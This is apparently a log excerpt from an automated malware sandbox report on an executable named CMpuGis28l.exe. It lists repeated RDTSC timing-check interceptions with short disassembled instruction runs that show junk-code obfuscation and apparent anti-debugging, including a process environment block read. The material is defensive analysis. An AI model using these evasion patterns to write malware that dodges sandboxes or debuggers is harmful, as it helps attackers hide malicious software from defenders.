Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1968EAC second address: 1968EB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1968EB0 second address: 1968EB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1968EB8 second address: 1968EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 196BE14 second address: 196BE1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 196B9D5 second address: 196B9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 jnc 00007F9334BA0026h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 196B9E7 second address: 196B9F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9334DAF996h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 196B9F2 second address: 196B9FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jno 00007F9334BA0026h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A2FF6D second address: 1A2FF77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9334DAF996h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A2FF77 second address: 1A2FF9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ch 0x00000007 jmp 00007F9334BA0034h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A2FF9B second address: 1A2FFB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A4h 0x00000007 jl 00007F9334DAF99Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A302C2 second address: 1A302C8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A303FC second address: 1A30402 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A3054C second address: 1A3055C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007F9334BA0026h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A30997 second address: 1A3099B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A3099B second address: 1A309AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F9334BA002Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A309AD second address: 1A309B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A309B1 second address: 1A309CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F9334BA0033h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A309CA second address: 1A309D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A30C72 second address: 1A30C76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A30E3A second address: 1A30E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jnp 00007F9334DAF996h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 1A30E47 second address: 1A30E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push esi 0x00000007 pop esi 0x00000008 jp 00007F9334BA0026h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F9334BA002Dh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730034 second address: 7730043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730043 second address: 773005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA0034h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773005B second address: 7730078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push edx 0x0000000b mov cx, C4EFh 0x0000000f pop ecx 0x00000010 movsx ebx, si 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bh, 3Ch 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730078 second address: 773007D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773007D second address: 77300AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000030h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, dx 0x00000015 jmp 00007F9334DAF99Fh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77300AE second address: 77300B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77300B4 second address: 77300B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77300B8 second address: 77300D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub esp, 18h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov edx, eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77300D1 second address: 773017D instructions: 0x00000000 rdtsc 0x00000002 call 00007F9334DAF99Eh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b mov dl, ah 0x0000000d pop edx 0x0000000e popad 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 movzx ecx, bx 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F9334DAF99Ah 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d call 00007F9334DAF99Eh 0x00000022 mov eax, 100118F1h 0x00000027 pop eax 0x00000028 movsx edi, si 0x0000002b popad 0x0000002c mov ebx, dword ptr [eax+10h] 0x0000002f jmp 00007F9334DAF9A6h 0x00000034 xchg eax, esi 0x00000035 pushad 0x00000036 mov si, EC0Dh 0x0000003a movzx eax, di 0x0000003d popad 0x0000003e push eax 0x0000003f pushad 0x00000040 mov esi, 33EA6341h 0x00000045 mov si, F27Dh 0x00000049 popad 0x0000004a xchg eax, esi 0x0000004b jmp 00007F9334DAF9A8h 0x00000050 mov esi, dword ptr [76EB06ECh] 0x00000056 pushad 0x00000057 mov cl, 73h 0x00000059 mov ch, dh 0x0000005b popad 0x0000005c test esi, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F9334DAF9A1h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773017D second address: 77301C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0031h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F9334BA0E9Ah 0x0000000f jmp 00007F9334BA002Eh 0x00000014 xchg eax, edi 0x00000015 jmp 00007F9334BA0030h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F9334BA002Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77301C9 second address: 77301CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77301CD second address: 77301D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77301D3 second address: 77301D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77301D9 second address: 77301F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9334BA002Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77301F2 second address: 77301F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77301F8 second address: 7730209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334BA002Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730209 second address: 773020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773020D second address: 7730234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call dword ptr [76E80B60h] 0x0000000e mov eax, 7617E5E0h 0x00000013 ret 0x00000014 pushad 0x00000015 call 00007F9334BA0036h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730234 second address: 7730259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push 00000044h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9334DAF9A9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730259 second address: 773025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773025D second address: 7730263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730263 second address: 7730269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730269 second address: 773026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773026D second address: 77302A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA0036h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d call 00007F9334BA002Eh 0x00000012 mov di, ax 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 movsx edi, ax 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77302A2 second address: 77302A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77302A6 second address: 77302FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, edi 0x00000008 jmp 00007F9334BA0032h 0x0000000d push eax 0x0000000e pushad 0x0000000f mov dh, B4h 0x00000011 mov ah, 3Eh 0x00000013 popad 0x00000014 xchg eax, edi 0x00000015 jmp 00007F9334BA0035h 0x0000001a push dword ptr [eax] 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007F9334BA002Ah 0x00000025 and esi, 03E1FF78h 0x0000002b jmp 00007F9334BA002Bh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730383 second address: 7730393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9334DAF99Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730393 second address: 77303E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F9334BA0038h 0x00000013 adc si, E358h 0x00000018 jmp 00007F9334BA002Bh 0x0000001d popfd 0x0000001e jmp 00007F9334BA0038h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77303E3 second address: 77304F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F9334DAF9A4h 0x00000012 xor al, 00000018h 0x00000015 jmp 00007F9334DAF99Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F9334DAF9A8h 0x00000021 or al, 00000078h 0x00000024 jmp 00007F9334DAF99Bh 0x00000029 popfd 0x0000002a popad 0x0000002b je 00007F93A44AEBFCh 0x00000031 jmp 00007F9334DAF9A6h 0x00000036 sub eax, eax 0x00000038 jmp 00007F9334DAF9A1h 0x0000003d mov dword ptr [esi], edi 0x0000003f jmp 00007F9334DAF99Eh 0x00000044 mov dword ptr [esi+04h], eax 0x00000047 pushad 0x00000048 movzx esi, bx 0x0000004b pushfd 0x0000004c jmp 00007F9334DAF9A3h 0x00000051 or eax, 53776CFEh 0x00000057 jmp 00007F9334DAF9A9h 0x0000005c popfd 0x0000005d popad 0x0000005e mov dword ptr [esi+08h], eax 0x00000061 jmp 00007F9334DAF99Eh 0x00000066 mov dword ptr [esi+0Ch], eax 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c pushfd 0x0000006d jmp 00007F9334DAF99Dh 0x00000072 add al, FFFFFFE6h 0x00000075 jmp 00007F9334DAF9A1h 0x0000007a popfd 0x0000007b push eax 0x0000007c push edx 0x0000007d rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77304F9 second address: 77304FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77304FE second address: 7730504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730504 second address: 7730508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730508 second address: 7730530 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+4Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730530 second address: 7730534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730534 second address: 7730547 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730547 second address: 773054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773054D second address: 7730551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730551 second address: 77305CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+10h], eax 0x0000000b pushad 0x0000000c jmp 00007F9334BA002Dh 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop edx 0x00000014 mov di, si 0x00000017 popad 0x00000018 popad 0x00000019 mov eax, dword ptr [ebx+50h] 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F9334BA0032h 0x00000023 sbb ch, FFFFFFA8h 0x00000026 jmp 00007F9334BA002Bh 0x0000002b popfd 0x0000002c mov ecx, 5EEA279Fh 0x00000031 popad 0x00000032 mov dword ptr [esi+14h], eax 0x00000035 jmp 00007F9334BA0032h 0x0000003a mov eax, dword ptr [ebx+54h] 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F9334BA0037h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77305CF second address: 77305D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77305D5 second address: 7730618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+18h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F9334BA002Bh 0x00000017 adc ch, FFFFFFAEh 0x0000001a jmp 00007F9334BA0039h 0x0000001f popfd 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730618 second address: 7730643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 65h 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+58h] 0x0000000d jmp 00007F9334DAF9A0h 0x00000012 mov dword ptr [esi+1Ch], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dl, ABh 0x0000001a mov esi, 10A7F0A5h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730643 second address: 7730657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov dh, al 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+5Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730657 second address: 773065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773065B second address: 7730669 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773077D second address: 7730783 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730783 second address: 7730789 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730789 second address: 77307D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [ebx+6Ch] 0x0000000f jmp 00007F9334DAF9A0h 0x00000014 mov word ptr [esi+30h], ax 0x00000018 jmp 00007F9334DAF9A0h 0x0000001d mov ax, word ptr [ebx+00000088h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77307D8 second address: 77307DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77307DC second address: 77307F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF9A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77307F9 second address: 7730864 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F9334BA0037h 0x00000009 and esi, 6D2AC7EEh 0x0000000f jmp 00007F9334BA0039h 0x00000014 popfd 0x00000015 jmp 00007F9334BA0030h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov word ptr [esi+32h], ax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F9334BA0037h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730864 second address: 773086A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773086A second address: 773086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 773086E second address: 7730872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730872 second address: 7730885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 7730885 second address: 77308A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9334DAF9A6h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77308A0 second address: 77308C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334BA002Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F9334BA002Bh 0x00000014 pop ecx 0x00000015 mov ebx, 7F78549Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77308C7 second address: 77308CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77308CC second address: 77308EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, ah 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+18h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9334BA0034h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CMpuGis28l.exe RDTSC instruction interceptor: First address: 77308EE second address: 7730933 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9334DAF99Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F9334DAF99Bh 0x00000015 xor si, E82Eh 0x0000001a jmp 00007F9334DAF9A9h 0x0000001f popfd 0x00000020 mov ax, 12B7h 0x00000024 popad 0x00000025 rdtsc
